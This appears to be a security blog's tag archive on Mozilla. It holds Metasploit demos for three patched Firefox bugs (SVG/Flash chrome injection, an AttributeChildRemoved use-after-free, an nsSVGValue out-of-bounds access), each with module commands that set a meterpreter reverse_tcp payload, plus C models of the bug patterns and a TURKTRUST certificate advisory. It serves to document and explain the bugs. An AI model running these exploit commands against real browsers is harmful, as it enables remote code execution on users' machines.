Tag Archives: Mozilla

Firefox 17.0.1 + Flash Privileged Code Injection Metasploit Demo

Timeline :

Vulnerability discovered and reported to the vendor by Marius Mlynski on 2012-11-21
Vulnerability corrected by the vendor on 2013-01-08
Metasploit PoC provided on 2013-05-15

PoC provided by :

Marius Mlynski
joev
sinn3r

Reference(s) :

CVE-2013-0758
CVE-2013-0757
MFSA-2013-15

Affected version(s) :

Firefox 17.0.1 and previous

Tested on Windows 7 SP1 with :

Firefox 17.0.1

Description :

This exploit gains remote code execution on Firefox 17.0.1 and all previous versions, provided the user has Flash installed. No memory corruption is used. First, a Flash object is cloned into the anonymous content of the SVG “use” element in the <body> (CVE-2013-0758). From there, the Flash object can navigate a child frame to a URL in the chrome:// scheme. Then a separate bug (CVE-2013-0757) is used to bypass the security wrapper around the child frame’s window reference and inject code into the chrome:// context. Once code runs in the chrome execution context, it can write the payload to disk, chmod it (on POSIX systems) and execute it. Note: Flash is used here to trigger the exploit, but any Firefox plugin with script access should be able to trigger it.

Commands :

use exploit/multi/browser/firefox_svg_plugin
set SRVHOST 192.168.178.36
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.36
exploit

getuid
sysinfo

Fraudulent TURKTRUST Digital Certificate Used In Active Attacks

Google, Microsoft and Mozilla have released alerts regarding active attacks using fraudulent digital certificates issued by TURKTRUST, a Turkish certificate authority and a subsidiary of the Turkish Armed Forces ELELE Foundation Company.

Google’s alert states that on 24 December it detected and blocked an unauthorized digital certificate for the “*.google.com” domain. This certificate was issued by an intermediate certificate authority (CA) chaining up to TURKTRUST. After investigation, in collaboration with TURKTRUST, it turned out that a second intermediate CA certificate had been mis-issued in the same way. Google Chrome’s certificate revocation list was updated on 26 December to block both fraudulent intermediate CAs.

Microsoft has released Security Advisory MSA-2798897, which affects all supported releases of Microsoft Windows. Microsoft is updating the Certificate Trust List and providing an update for all supported releases of Windows that removes these fraudulent certificates. Systems running Windows 8, Windows RT and Windows Server 2012, and devices running Windows Phone 8, are updated automatically and are protected.

The following certificates are added to the Untrusted Certificates store:

  • Certificate “*.google.com” issued by “*.EGO.GOV.TR” with thumbprint “4d 85 47 b7 f8 64 13 2a 7f 62 d9 b7 5b 06 85 21 f1 0b 68 e3”.
  • Certificate “e-islem.kktcmerkezbankasi.org” issued by “TURKTRUST Elektronik Sunucu Sertifikasi Hizmetleri” with thumbprint “f9 2b e5 26 6c c0 5d b2 dc 0d c3 f2 dc 74 e0 2d ef d9 49 cb”.
  • Certificate “*.EGO.GOV.TR” issued by “TURKTRUST Elektronik Sunucu Sertifikasi Hizmetleri” with thumbprint “c6 9f 28 c8 25 13 9e 65 a6 46 c4 34 ac a5 a1 d2 00 29 5d b1”.

Mozilla has published a Security Blog post and takes a different position from Google and Microsoft. The foundation will actively revoke trust for the two fraudulent certificates, and will also suspend inclusion of the “TÜRKTRUST Bilgi İletişim ve Bilişim Güvenliği Hizmetleri A.Ş. (c) Aralık 2007” root certificate, pending further review. A new release of Firefox is scheduled for Tuesday 8 January.

These fraudulent certificates could be used to spoof content, perform phishing attacks, or mount man-in-the-middle attacks against the named domains, so we advise you to update as soon as possible.

CVE-2011-3659 Firefox 8/9 AttributeChildRemoved() Use-After-Free Metasploit Demo

Timeline :

Vulnerability discovered by regenrecht
Vulnerability reported by regenrecht to ZDI
Vulnerability reported to the vendor by ZDI on 2011-12-06
Coordinated public release of the vulnerability on 2011-12-20
Metasploit PoC provided on 2012-05-07

PoC provided by :

regenrecht
Lincoln
corelanc0d3r

Reference(s) :

CVE-2011-3659
OSVDB-78736
MFSA-2012-04

Affected version(s) :

Mozilla Firefox before version 10.0
Mozilla Firefox before version 3.6.26
Mozilla Thunderbird before version 10.0
Mozilla Thunderbird before version 3.1.18
Mozilla SeaMonkey before version 2.7

Tested on Windows XP Pro SP3 with :

Mozilla Firefox version 9.0.1

Description :

This Metasploit module is quite unstable and exploitation succeeds only intermittently.

This module exploits a use-after-free vulnerability in Firefox 8/8.0.1 and 9/9.0.1. Removing a child node from an nsDOMAttribute can leave that child accessible after removal, because the AttributeChildRemoved notification is sent prematurely: mFirstChild is not set to NULL until after the notification call returns, so an observer that runs during the notification can still reach the removed child and keep a reference to it. By carefully manipulating the memory layout, this can lead to arbitrary code execution.
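As an added illustration (not Mozilla’s code and not the Metasploit module), the following C program models the ordering mistake described above: a toy attribute type that notifies an observer about a child’s removal before clearing its own pointer to that child, beside the corrected order. All type and function names (attr_t, child_t, attr_remove_child_vulnerable, attr_remove_child_fixed) are invented for the example; the observer stands in for attacker-controlled page script that keeps whatever reference it can obtain during the notification.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Added example, not Mozilla code: a toy model of the CVE-2011-3659 ordering
 * bug. An "attribute" owns one text child and tells an observer when that
 * child is removed. All names (attr_t, child_t, attr_remove_child_*) are
 * invented for the illustration; this is not the nsDOMAttribute source. */

typedef struct child {
    char text[32];
} child_t;

typedef struct attr {
    child_t *first_child;                         /* models mFirstChild */
    child_t *(*on_child_removed)(struct attr *);  /* models the AttributeChildRemoved notification */
} attr_t;

/* The attacker's observer (a mutation listener written in page script): it
 * reads the attribute's current first child and hands it back to be kept. */
static child_t *observer_grab_child(attr_t *a) {
    return a->first_child;
}

/* Vulnerable ordering: the observer runs while the attribute still points at
 * the child, so it can obtain a reference that dangles once the child is freed.
 * Returns the address the observer captured, taken before the free so the
 * caller never handles a freed pointer value. */
static uintptr_t attr_remove_child_vulnerable(attr_t *a) {
    child_t *victim = a->first_child;
    child_t *grabbed = a->on_child_removed(a);    /* still sees the child */
    uintptr_t captured = (uintptr_t)grabbed;
    a->first_child = NULL;                        /* cleared too late */
    free(victim);
    return captured;
}

/* Fixed ordering: unlink first, then notify. An observer that consults the
 * attribute now sees NULL and has no path to the object about to be freed. */
static uintptr_t attr_remove_child_fixed(attr_t *a) {
    child_t *victim = a->first_child;
    a->first_child = NULL;                        /* cleared before anyone is told */
    child_t *grabbed = a->on_child_removed(a);    /* sees NULL */
    uintptr_t captured = (uintptr_t)grabbed;
    free(victim);
    return captured;
}

static attr_t make_attr(void) {
    attr_t a;
    a.first_child = calloc(1, sizeof(child_t));
    if (a.first_child == NULL) abort();
    strcpy(a.first_child->text, "child");
    a.on_child_removed = observer_grab_child;
    return a;
}

/* 1 if the observer walked away holding the address of the freed child. */
int vulnerable_leaks_dangling_pointer(void) {
    attr_t a = make_attr();
    uintptr_t victim = (uintptr_t)a.first_child;
    return attr_remove_child_vulnerable(&a) == victim;
}

/* 1 if the observer captured anything at all under the fixed ordering (it should not). */
int fixed_leaks_dangling_pointer(void) {
    attr_t a = make_attr();
    return attr_remove_child_fixed(&a) != 0;
}

int main(void) {
    printf("vulnerable ordering leaks dangling pointer: %d\n", vulnerable_leaks_dangling_pointer());
    printf("fixed ordering leaks dangling pointer:      %d\n", fixed_leaks_dangling_pointer());
    return 0;
}
```

The captured address is compared as an integer rather than dereferenced, so the program shows where the dangling reference comes from without itself committing a use-after-free; the real exploit goes on to reallocate that freed memory with attacker-controlled contents, which is the “carefully manipulating the memory layout” step in the description.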

Commands :

use exploit/windows/browser/mozilla_attribchildremoved
set SRVHOST 192.168.178.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

getuid
sysinfo

CVE-2011-3658 Firefox 7/8 nsSVGValue Vulnerability Metasploit Demo

Timeline :

Vulnerability discovered by regenrecht
Vulnerability reported by regenrecht to ZDI
Vulnerability reported to the vendor by ZDI on 2011-12-01
Coordinated public release of the vulnerability on 2011-12-20
Metasploit PoC provided on 2012-05-07

PoC provided by :

regenrecht
Lincoln
corelanc0d3r

Reference(s) :

CVE-2011-3658
OSVDB-77953
MFSA-2011-55

Affected version(s) :

Mozilla Firefox before version 9.0
Mozilla Firefox before version 3.6.28
Mozilla Thunderbird before version 9.0
Mozilla SeaMonkey before version 2.6

Tested on Windows XP Pro SP3 with :

Mozilla Firefox version 7.0.1

Description :

This Metasploit module is quite unstable and exploitation succeeds only intermittently.

This module exploits an out-of-bounds access flaw in Firefox 7 and 8. The notification of nsSVGValue observers via nsSVGValue::NotifyObservers(x,y) uses a loop that can result in an out-of-bounds access to attacker-controlled memory. The mObservers ElementAt() function (which returns the stored pointers) does not validate that a given index is within bounds. If a custom observer of nsSVGValue is created which removes elements from the observer array during the notification, and the memory layout is manipulated properly, ElementAt() can pick up an attacker-provided pointer, which can be leveraged to gain remote arbitrary code execution.
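As an added illustration (not Mozilla’s code and not the Metasploit module), the following C program models the loop pattern described above: a toy value type notifies an array of observers, one observer unsubscribes from inside its callback, and the vulnerable loop keeps indexing with the length it cached before the callbacks ran, through an ElementAt()-style accessor that performs no bounds check. A snapshot-based loop is shown beside it; that is one reasonable hardening, not Mozilla’s actual patch. All names (observer_t, value_t, notify_observers_vulnerable, notify_observers_fixed) are invented, and the “sprayed” observer stands in for whatever the attacker arranged to sit in memory just past the live elements.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not Mozilla code: a toy model of the CVE-2011-3658 pattern.
 * A value keeps an array of observer pointers and notifies each one in a loop;
 * one observer unsubscribes during the callback. All names (observer_t,
 * value_t, notify_observers_*) are invented for the illustration; this is not
 * the nsSVGValue source and the "fixed" loop is not Mozilla's actual patch. */

#define MAX_SLOTS 4

typedef struct value value_t;

typedef struct observer {
    const char *name;
    void (*on_change)(value_t *, struct observer *);
    int calls;                    /* how many times this callback ran */
} observer_t;

struct value {
    observer_t *slots[MAX_SLOTS]; /* backing storage, models the mObservers array */
    int count;                    /* live length, models Length() */
    observer_t *sprayed;          /* what the attacker arranged to sit just past the live elements */
};

/* Models ElementAt(): hands back whatever pointer is at index i, with no check
 * against the live length. */
static observer_t *element_at(value_t *v, int i) {
    return v->slots[i];
}

static int is_registered(value_t *v, observer_t *o) {
    for (int i = 0; i < v->count; i++)
        if (v->slots[i] == o) return 1;
    return 0;
}

static void remove_observer(value_t *v, observer_t *o) {
    for (int i = 0; i < v->count; i++) {
        if (v->slots[i] != o) continue;
        memmove(&v->slots[i], &v->slots[i + 1],
                (size_t)(v->count - i - 1) * sizeof(observer_t *));
        v->count--;
        /* The slot that just fell outside the live range now holds whatever the
         * heap layout leaves there; in the toy that is the sprayed pointer. */
        v->slots[v->count] = v->sprayed;
        return;
    }
}

/* Vulnerable: the length is read once, so after an observer shrinks the array
 * the loop keeps indexing past the live elements through the unchecked
 * element_at() and ends up calling through the attacker's pointer. */
static void notify_observers_vulnerable(value_t *v) {
    int n = v->count;
    for (int i = 0; i < n; i++) {
        observer_t *o = element_at(v, i);
        o->on_change(v, o);
    }
}

/* Hardened: notify from a snapshot taken before any callback runs, and skip
 * entries that were unregistered meanwhile. Nothing is read past the live
 * length, and no observer is skipped because its neighbour left. */
static void notify_observers_fixed(value_t *v) {
    observer_t *snapshot[MAX_SLOTS];
    int n = v->count;
    memcpy(snapshot, v->slots, (size_t)n * sizeof(observer_t *));
    for (int i = 0; i < n; i++) {
        if (is_registered(v, snapshot[i]))
            snapshot[i]->on_change(v, snapshot[i]);
    }
}

/* The "custom observer": unsubscribes itself from inside the notification. */
static void on_change_unsubscribe(value_t *v, observer_t *self) {
    self->calls++;
    remove_observer(v, self);
}

static void on_change_count(value_t *v, observer_t *self) {
    (void)v;
    self->calls++;
}

typedef struct { int sprayed; int benign; } result_t;

/* Scenario: [remover, benign] are registered; remover drops out mid-loop. */
static result_t run_scenario(int use_fixed) {
    observer_t remover = {"remover", on_change_unsubscribe, 0};
    observer_t benign  = {"benign",  on_change_count, 0};
    observer_t sprayed = {"sprayed", on_change_count, 0}; /* attacker-controlled "observer" */
    value_t v = {{&remover, &benign, NULL, NULL}, 2, &sprayed};
    if (use_fixed) notify_observers_fixed(&v);
    else           notify_observers_vulnerable(&v);
    result_t r = {sprayed.calls, benign.calls};
    return r;
}

int sprayed_callback_runs(int use_fixed) { return run_scenario(use_fixed).sprayed; }
int benign_callback_runs(int use_fixed)  { return run_scenario(use_fixed).benign; }

int main(void) {
    printf("vulnerable loop: sprayed=%d benign=%d\n", sprayed_callback_runs(0), benign_callback_runs(0));
    printf("fixed loop:      sprayed=%d benign=%d\n", sprayed_callback_runs(1), benign_callback_runs(1));
    return 0;
}
```

In the vulnerable loop the attacker’s callback runs once and the legitimate second observer is never notified, because the removal shifted it into a slot the loop had already passed; the snapshot loop notifies every observer that is still registered and never touches the slot past the live length.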

Commands :

use exploit/windows/browser/mozilla_nssvgvalue
set SRVHOST 192.168.178.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

getuid
sysinfo